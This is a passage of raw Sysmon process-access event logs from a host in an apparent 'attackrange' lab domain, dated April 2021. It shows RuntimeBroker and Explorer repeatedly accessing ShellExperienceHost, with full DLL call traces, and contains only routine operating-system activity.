System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079625Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079624Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079623Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079622Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079621Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079620Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-8105-00000000BB01}8362064C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079619Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2a3301|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079618Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.513{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+2ca4e2|C:\Windows\System32\Windows.Storage.dll+5ed75|C:\Windows\System32\Windows.Storage.dll+f5366|C:\Windows\System32\Windows.Storage.dll+2a3263|C:\Windows\System32\Windows.Storage.dll+f5a83|C:\Windows\System32\Windows.Storage.dll+f5afa|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079617Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43485924C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\shcore.dll+35576|C:\Windows\System32\shcore.dll+201ef|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6112d|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+7bfe9|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a 10341000x800000000000000079616Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079615Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079614Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079613Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079612Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079611Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079610Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079609Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+12ac99|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\Windows.Storage.dll+e907c 10341000x800000000000000079608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+e7c73|C:\Windows\System32\Windows.Storage.dll+e73e5|C:\Windows\System32\Windows.Storage.dll+e72f9|C:\Windows\System32\Windows.Storage.dll+e7292|C:\Windows\System32\Windows.Storage.dll+5b9fd|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06 10341000x800000000000000079607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+60513|C:\Windows\System32\Windows.Storage.dll+5bbcc|C:\Windows\System32\Windows.Storage.dll+5bb23|C:\Windows\System32\Windows.Storage.dll+5b99b|C:\Windows\System32\Windows.Storage.dll+ddfd6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba 10341000x800000000000000079606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:27.498{A7A01FEF-C0A6-607E-7705-00000000BB01}43483960C:\Windows\System32\RuntimeBroker.exe{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+61c8b|C:\Windows\System32\Windows.Storage.dll+5d181|C:\Windows\System32\Windows.Storage.dll+5ceeb|C:\Windows\System32\Windows.Storage.dll+12acc5|C:\Windows\System32\Windows.Storage.dll+ddfb8|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+3cdcb|C:\Windows\System32\combase.dll+3e2d2|C:\Windows\System32\combase.dll+636f3|C:\Windows\System32\combase.dll+3e4dd|C:\Windows\System32\combase.dll+61a3f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000079605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 